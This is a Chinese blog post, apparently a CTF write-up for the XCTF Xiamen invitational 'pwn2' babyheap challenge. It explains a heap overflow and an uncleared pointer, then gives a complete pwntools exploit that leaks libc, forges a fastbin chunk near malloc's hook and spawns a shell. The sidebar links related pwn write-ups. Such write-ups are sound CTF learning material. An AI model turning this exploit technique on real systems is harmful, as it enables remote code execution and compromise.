厦门邀请赛 pwn2 XCTF

最新推荐文章于 2023-03-19 16:52:57 发布
最新推荐文章于 2023-03-19 16:52:57 发布
阅读量648 收藏
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/90244225
版权

这个题 看起来是一个无懈可击的堆题

典型的 堆菜单题 然后看一下函数里面有没有什么利用的点

这里   感觉没有什么利用的点  然后我们往下看

 

这里的修改长度是我们自己输入 也就是我们自己定的  长度 那么我们就可以 实现堆块任意输入

然后继续往下看

 

这里可以有些麻烦 输出的内容长度被限定在了 一开始的堆块大小   这个 可能需要一些绕过

然后看一下 dele

其实dele 这里做的已经很不错了  但是也是没有把用户指针给 清理掉

那么 我们就 get到了这个题的姿势

首先可以任意读写 堆块 然后可以又没有清理用户指针 然后我们可以 伪造堆块  绕过堆块大小

然后可以 填充   00 然后 可以 打印main_arena  然后直接一把梭就可以了

#!/usr/bin/python2
# -*- coding:utf-8 -*-

from pwn import*
context.log_level="debug"
io=remote('111.198.29.45',43812)
#io=process("./babyheap")
elf=ELF("./babyheap")
libc=ELF("./libc-2.23.so")
one_gadget_addr= 0x4526a
def add(size,content):
	io.recvuntil(">> ")
	io.sendline("1")
	io.sendline(str(size))
	io.send(content)

def edit(index,size,content):
	io.recvuntil(">> ")
	io.sendline("2")
	io.sendline(str(index))
	io.sendline(str(size))
	io.send(content)

def show(index):
	io.recvuntil(">> ")
	io.sendline("3")
	io.sendline(str(index))

def dele(index):
	io.recvuntil(">> ")
	io.sendline("4")
	io.sendline(str(index))


if __name__ =='__main__':
	add(0x20,'a'*0x20)
	add(0x80,'b'*0x80)
	add(0x80,'c'*0x80)
	add(0x80,'c'*0x80)
	dele(1)
	payload='a'*0x20+p64(0)+p64(0x121)
	edit(0,len(payload),payload)
	payload='b'*0x80+p64(0)+p64(0x91)+'e'*0x80
	add(0x110,payload)
	dele(2)
	#gdb.attach(io)
	show(1)
	io.recvuntil('\x91\x00\x00\x00\x00\x00\x00\x00')
	main_arena_addr=u64(io.recv(6).ljust(8, '\x00'))-88
	log.success("main_arena_addr"+hex(main_arena_addr))
	libc_base_addr=main_arena_addr-0x3C4B20
	log.success("libc_base_addr"+hex(libc_base_addr))
	one_gadget_addr=one_gadget_addr +libc_base_addr
	fake_chunk_addr=main_arena_addr-0x33
	add(0x60,'d'*0x60)
	add(0x60,'d'*0x60)
	dele(4)
	payload='d'*0x80+p64(0)+p64(0x71)+p64(fake_chunk_addr)
	edit(3,len(payload),payload)
	add(0x60,'d'*0x60)

	payload=0x13 * 'a'+p64(one_gadget_addr)
	add(0x60,payload.ljust(0x60,'a'))
	#gdb.attach(io)
	add(0x90,'s'*0x90)
	io.interactive()
	io.close()

 

pipixia233333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cgpwn2(xctf)
weixin_43868725的博客
05-06 370
0x0 程序保护和流程 保护: 流程: main() hello() 可以发现在hello()中存在栈溢出。 0x1 利用过程 在函数窗口中发现了system()函数,所以我们只需要字符串"/bin/sh"。就可以getshell了。仔细观察程序可以发现name变量是全局变量存放在.bss段中。 所以我们只需要向name中输入"/bin/sh",s=‘a’*(0x26+4)+p32(sys...
xman 厦门邀请赛 pwn1 babystack writeup
qq_39596232的博客
09-07 532
题目描述: 这个题目针对现在的我还是有点难度的,花费了我三天的时间,最后发现原因竟是因为字符转化为整型的过程中多加了好多0. 分析思路: 1、首先查看文件的详细信息: tucker@ubuntu:~/xman/pwn/pwn1$ file babystack babystack: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), d...
XCTF PWN level2
prettyX的博客
06-10 251
查看基本信息 尝试运行 IDA F5 继续查看脆弱函数,88h的缓冲区可以写入0x100,发现溢出点 shift+F12,发现了“/bin/sh”
[XCTF-pwn] 15_厦门邀请赛-pwn
weixin_52640415的博客
03-04 326
同样是写溢出到return的题,这题设置了canary,canary这个机制是把一个0+7位随机数放在rbp的前面,如果发现被改动就调用check_stack_fail然后退出。 这个题有循环,只有退出时才会检查,所以在前边可以输入适当长度带出canary在退出前再恢复 from pwn import * ''' patchelf --set-interpreter /home/shi/buuctf/buuoj_2.23_amd64/ld_2.23-0ubuntu10_amd64.so pwn
(攻防世界)(pwn)pwn1(厦门邀请赛)babystack
PLpa的博客
07-21 2603
canary!canary!canary! 拿到题目,下载附件,查看保护。 可以很清楚的看到,程序开了canary,这就说明我们不能实现暴力的栈溢出,还要考虑这个canary的值。 我们首先运行一下程序: 可以很清楚的看出程序的功能,当我们选择1时,我们就可以输入,当我们选择2时,我们可以输出我们前面输入的东西。 进入IDA看源代码: 我们可以看到canary的值存放在v6里,v6距离rbp...
邀请赛misc key
afu42832的博客
09-24 772
目录 题目下载 提示 解题过程 1.提取RGB值 2.找到key 3.循环异或,得到flag 反思 题目下载 题目名:key 提示 提取钥匙中特殊颜色的RGB循环异或KEY值 解题过程 1....
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1635
题目地址:pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
0x00 cg_pwn2XCTF攻防世界pwn系列writeup】
weixin_36711901的博客
11-20 464
目录一、基本情况分析:二、构造payload:三、EXP:合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 一、基本情况分析: 首先对可执行文件进行基本检查: 如图所示,该文件为32位i386的ELF可执行文件,只开启了NX,RELRO(部分
pwn1(xctf)
weixin_43868725的博客
08-08 516
0x0 程序保护和流程 保护: 流程: 输入1能够读入长度为0x100的字符串到s而s距离rbp的距离为0x90存在明显的栈溢出,输入2能够输出s,输入3则退出程序。 0x1 利用过程 1.因为程序保护中开启了canary所以直接进行栈溢出就会触发canary。所以可以利用puts函数的特性一直输出字符直到遇到**\x00**,将canary的值输出出来。当输入0x87*‘a’+’/n’时不会有多余数据输出,而当输入0x88*‘a’+’/n’就会有多余数据输出,说明canary中有**\x00**。
pwn2own2020:通过链接六个漏洞通过Safari破坏macOS内核
02-04
通过链接六个漏洞通过Safari破坏macOS内核 总览 该存储库包含利用和技术细节,并。 有关更多信息,您还可以查看。 该存储库还包括成功利用。 如何繁殖 ... ... 通过Safari使用攻击者服务器的IP访问网站: ...
西工大第三届“探索·解密”趣味密码比赛-个人WriteUp
纸鹿摸鱼中
11-13 2054
由西北工业大学信息安全协会负责的第三届“探索·解密”趣味密码比赛主要有Crypto、Misc方向的CTF题型,难度较易,适合入门。此为个人WriteUp。
XCTF_asong_WP
qq_43445167的博客
03-07 469
确实恶心。 本题的整体逻辑是通过输入的字符串变换that_girl文件,再把变换的数据写入out文件。属于已知密文求明文。 整体逻辑是通过对that_girl文本文件进行词频分析。 将输入的字符串转换为对应词频数组v1。 对v1进行类似与a=b,b=c,c=a 的元素顺序交换,记为v2。 将整个v2视为一整个二进制流循环左移3位,记为v3。 将v3写入out文件 解密脚本如下: #includ...
[XCTF-Reverse] 62 XCTF 4th-QCTF-2018_asong
weixin_52640415的博客
03-24 457
这是个比较正规的逆向题 主程序先读入flag然后打开一个文档并统计字频然后加密输出到out文件 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { void *v3; // ST00_8 const char *v4; // ST08_8 v3 = malloc(0xBCuLL); v4 = (const char *)malloc(0x50uLL); init_0(); read_flag((__int64
CTF刷题之旅 2023.3.18
qq_62713355的博客
03-19 737
常规操作,看备注,扔010,binwalk,stegsolve(图片很大不能显示完全,就只看了每一张的左上角)……输入flag发现是错的,原来是密斯电码常用缩写:VY=VERY,GUD=GOOD(简直了,在这里还能挖个坑)。反编译后得到一段python代码,发现是一个计算flag的函数,下载到本地运行即可得到flag。启动winhex解码,右键编辑,选择convert中的Hex-ASCII选项,解码结果如下。得到一串字符,观察得知均为数字和字母且字母最大为f,猜测为16进制编码,解码后得到flag。
溢出练习题pwn1
Elvira
08-26 5135
集训慢慢接近了尾声,樊荣学长给我们jian
NWPU CTF 西北工业大学留言板
feng的博客
10-12 1122
前言 这题考察的是session文件包含来获取flag。因为可以用伪协议读取相关的所有文件,所以建议在本地复现一下,可以更好的理解。 WP 环境一共有三部分,主页,留言板和tips。tips那里是phpinfo,从中可以得到很多我们需要的东西。 首先发现index.bak.php?action=message.php,怀疑存在文件包含,尝试用php伪协议读取一下base64加密的源码,成功读取到了。重要的是msg.php: <?php header('content-type:application
CTF wp 2018“骇极杯”全国大学生网络安全邀请赛暨第四届上海市大学生网络安全大赛线上赛 writeup
Thea_1207的博客
11-05 3854
为0x00 签到题操作内容: | 登陆比赛界面上去看到签到题,一般情况下签到题是没有难度的题目给定一串字符MZWGCZ33GM2TEMRSMQZTALJUGM4WKLJUMFTGELJZGFTDILLBMJSWEYZXGNTGKMBVMN6Q Base32 一闪而过,比的就是手速,解码拿到flag。 FLAG 值: 标志{35222d30-439e-4afb-91F4-abebc73fe0...
XCTF 3rd-GCTF-2017 hackme
qq_41071646的博客
05-07 1739
这个题 有字符串 感觉简单了许多 然后这个题 算法就在这 我们写出来脚本就行 #include <stdio.h> #include<iostream> #include<iomanip> #include<stdio.h> #include<string.h> #include<algorithm> #incl...
攻防世界 四(进阶篇)catch-me
sjt670994562的博客
06-13 1454
后来做题速度完全掉了下去,主要是因为基础太差,不管是c、python语言基础,还是汇编基础,还是linux使用,shell脚本的编写,都差太多,所以经过这几天的冲刺,我打算从基础开始,不急于求成,题会做,但不会那么着急了,太急了学的东西也是没用的,这是这几天卡在这道题上,以及同学对我的一些批评总结出来的一些观点。 catch-me 分析,不是elf不是exe,扔到C32Asm,看到头文件 FD 3...
ctfshow的pwn2
最新发布
09-28
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值